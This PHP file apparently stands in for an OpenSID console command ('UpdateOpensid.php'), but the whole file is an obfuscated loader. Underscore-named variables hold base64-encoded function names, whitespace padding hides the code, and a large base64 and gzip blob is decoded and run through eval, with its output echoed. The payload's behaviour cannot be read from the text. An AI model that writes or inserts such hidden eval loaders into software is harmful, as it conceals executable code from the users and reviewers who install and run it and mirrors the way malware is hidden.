<?php 
        $__='printf';$_='Loading app/Console/Commands/UpdateOpensid.php';
        



























































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































                                                                                                                                                                                                                     $________;
